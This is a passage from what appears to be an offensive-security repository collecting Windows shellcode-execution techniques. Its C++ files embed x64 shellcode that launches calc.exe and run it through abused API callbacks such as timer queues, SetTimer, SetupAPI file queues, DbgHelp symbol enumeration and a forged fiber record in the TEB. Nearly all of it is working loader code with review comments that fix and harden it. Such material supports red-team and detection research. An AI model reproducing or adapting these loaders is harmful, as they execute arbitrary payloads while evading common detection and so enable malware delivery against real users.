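"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as a timer-queue callback (thread-pool thread) 100 ms after start.
// Returns 0 after the wait below ends, 1 on any setup failure.
int main(){
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_READWRITE);
    if (!addr) { return 1; }
    RtlMoveMemory(addr, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!VirtualProtect(addr, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    HANDLE queue = ::CreateTimerQueue();
    if (!queue) { return 1; }
    HANDLE gDoneEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (!gDoneEvent) { return 1; }

    // One-shot timer (DueTime 100 ms, Period 0); the "callback" is the payload.
    HANDLE timer = NULL;
    if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) {
        printf("Fail");
        return 1; // the original fell through into the infinite wait below
    }

    // Nothing ever signals gDoneEvent: the wait only keeps the main thread alive while
    // the timer thread runs the payload. NOTE(review): the process therefore ends only
    // if the payload terminates it - confirm that is the intended behaviour.
    if (WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0)
        printf("WaitForSingleObject failed (%lu)\n", GetLastError());
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/OpenThreadWaitChainSession/OpenThreadWaitChainSession.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/RtlUserFiberStart/RtlUserFiberStart.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/RtlUserFiberStart/Source.cpp:
--------------------------------------------------------------------------------
// alfarom256

// (include targets were stripped from this listing)
#include
#include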
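
// Hard-coded x64 TEB/fiber offsets taken from one Windows build; nothing below
// validates them at runtime, so treat this sample as build-specific.
#define TEB_FIBERDATA_PTR_OFFSET 0x17ee // TEB byte that holds the HasFiberData flag
#define LPFIBER_RIP_OFFSET 0x0a8        // saved RIP inside the fiber record (per the original author)
#define TEB_HASFIBERDATA_BIT 0x4

// calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

typedef int(WINAPI* tRtlUserFiberStart)();

// Fakes a fiber record whose saved RIP is the payload, marks the current thread
// as having fiber data, and lets ntdll!RtlUserFiberStart "resume" the fiber.
// Returns 0 on success, -1 / a Win32 error code on setup failures (the file's
// existing conventions). The TEB is only modified once everything else succeeded.
int main() {
    HMODULE hMod = GetModuleHandleA("ntdll");
    if (!hMod) { return -1; }
    tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart)GetProcAddress(hMod, "RtlUserFiberStart");
    if (!lpRtlUserFiberStart) { return -1; }

    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_READWRITE);
    if (!addr) {
        return GetLastError();
    }
    RtlMoveMemory(addr, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!VirtualProtect(addr, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) {
        return GetLastError();
    }

    // Fake fiber record: only the slot RtlUserFiberStart reads the RIP from is populated
    // (the original wrote the literal 0x0a8 instead of the macro defined for it).
    uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100);
    if (!lpDummyFiberData) { return -1; }
    *(LPVOID*)(lpDummyFiberData + LPFIBER_RIP_OFFSET) = addr;
    // NOTE(review): the original author's WinDbg trace shows the dispatch going through
    // ntdll!_guard_dispatch_icall_fptr (a nop in that run):
    //   call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)}
    // With CFG enforced the payload address would presumably have to be a valid call target - confirm.

    // Set the HasFiberData bit, then point NtTib.FiberData (gs:[0x20]) at the fake record.
    _TEB* teb = NtCurrentTeb();
    unsigned char* pTebFlags = (unsigned char*)teb + TEB_FIBERDATA_PTR_OFFSET;
    *pTebFlags |= TEB_HASFIBERDATA_BIT;
    __writegsqword(0x20, lpDummyFiberData);

    lpRtlUserFiberStart();
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SetTimer/SetTimer.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include


// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as a thread-scoped window-timer procedure dispatched from
// the message loop. Returns 0 after the WM_TIMER was dispatched, 1 on setup failure.
int main() {
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, &op[0], sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    // hWnd NULL -> thread timer, nIDEvent ignored. The original passed NULL for uElapse,
    // which SetTimer clamps to USER_TIMER_MINIMUM anyway; say so explicitly.
    UINT_PTR timerId = ::SetTimer(NULL, 0, USER_TIMER_MINIMUM, (TIMERPROC)address);
    if (timerId == 0) { return 1; }

    // Pump until the WM_TIMER has been dispatched. The original dispatched exactly one
    // message, which only works if WM_TIMER happens to be the first one retrieved.
    MSG msg;
    while (::GetMessageW(&msg, NULL, 0, 0) > 0) {
        ::DispatchMessageW(&msg);
        if (msg.message == WM_TIMER) { break; }
    }
    ::KillTimer(NULL, timerId);
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SetTimer/SetTimer.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

#include
#pragma comment(lib, "Setupapi.lib")

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as the file-queue notification callback of SetupCommitFileQueueW.
// Returns 0 when queueing and committing both reported success, 1 otherwise.
int main() {
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, &op[0], sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    HSPFILEQ hQueue = ::SetupOpenFileQueue();
    if (hQueue == INVALID_HANDLE_VALUE) { return 1; }

    int rc = 1;
    // Queue one copy so the commit has something to report on. The source path was
    // misspelled ("sytem32") in the original, so the copy itself could never succeed.
    // NOTE(review): the target is under c:\windows\temp, so the copy step needs write
    // access there - run elevated or pick another target directory.
    if (::SetupQueueCopyW(hQueue, L"c:\\", L"\\windows\\system32\\", L"kernel32.dll", NULL, NULL,
                          L"c:\\windows\\temp\\", L"kernel32.dll", SP_COPY_NOSKIP)
        && ::SetupCommitFileQueueW(::GetTopWindow(NULL), hQueue, (PSP_FILE_CALLBACK_W)address, NULL)) {
        rc = 0;
    }
    ::SetupCloseFileQueue(hQueue);
    return rc;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/SymEnumProcesses/SymEnumProcesses.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include
#include


// Requires Dbghelp.lib (linked here the same way the sibling Sym* samples do it)
#pragma comment(lib, "Dbghelp.lib")

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as the DbgHelp SymEnumProcesses callback.
// Returns 0 when the enumeration reported success, 1 on any failure.
int main() {
    // The original copied into addr before checking it for NULL. Stage RW, then
    // switch to RX: no private RWX region, payload not expected to write to itself.
    LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_READWRITE);
    if (!addr) { return 1; }
    ::RtlMoveMemory(addr, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(addr, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    HANDLE hProcess = ::GetCurrentProcess();
    if (!::SymInitialize(hProcess, NULL, FALSE)) { return 1; }

    BOOL ok = ::SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)addr, NULL);

    ::SymCleanup(hProcess);
    return ok ? 0 : 1;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SymEnumProcesses/SymEnumProcesses.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/SymFindFileInPath/SymFindFileInPath.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

// requires Dbghelp.lib
#include
#pragma comment(lib, "Dbghelp.lib")

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as the "found file" validation callback of SymFindFileInPath.
// Returns 0 when the lookup reported success, 1 on any failure.
int main() {
    HANDLE hProcess = ::GetCurrentProcess();

    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, &op[0], sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    if (!::SymInitialize(hProcess, NULL, TRUE)) { return 1; }

    int rc = 1;
    // SymSrvGetFileIndexInfo expects sizeofstruct to be filled in by the caller;
    // the original passed an uninitialized struct.
    SYMSRV_INDEX_INFO finfo = {};
    finfo.sizeofstruct = sizeof(finfo);
    if (::SymSrvGetFileIndexInfo("c:\\windows\\system32\\kernel32.dll", &finfo, 0)) {
        char found[MAX_PATH] = { 0 };
        // SSRVOPT_DWORDPTR: id points at the DWORD timestamp, "two" is the image size.
        if (::SymFindFileInPath(hProcess, "c:\\windows\\system32", "kernel32.dll", &finfo.timestamp,
                                finfo.size, 0, SSRVOPT_DWORDPTR, found,
                                (PFINDFILEINPATHCALLBACK)address, NULL)) {
            rc = 0;
        }
    }

    ::SymCleanup(hProcess);
    return rc;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SymFindFileInPath/SymFindFileInPath.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/SysEnumSourceFiles/SysEnumSourceFiles.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

// requires Dbghelp.lib
#include
#pragma comment(lib, "Dbghelp.lib")

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as the per-source-file callback of SymEnumSourceFiles.
// Returns 0 when the enumeration reported success, 1 on any failure.
int main() {
    HANDLE hProcess = ::GetCurrentProcess();

    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, &op[0], sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    if (!::SymInitialize(hProcess, NULL, TRUE)) { return 1; }

    // ModBase NULL = every loaded module. NOTE(review): the callback is presumably only
    // reached for modules whose symbols carry source-file information; without PDBs
    // it may never run - confirm on the target machine.
    BOOL ok = ::SymEnumSourceFiles(hProcess, NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACK)address, NULL);

    ::SymCleanup(hProcess);
    return ok ? 0 : 1;
}
--------------------------------------------------------------------------------
/Shellcode Execution/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters: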
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/VerifierEnumerateResource/VerifierEnumerateResource.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | typedef ULONG(WINAPI* VerifierEnumResourceFn)( 6 | HANDLE Process, 7 | ULONG Flags, 8 | ULONG ResourceType, 9 | AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, 10 | PVOID EnumerationContext 11 | ); 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | 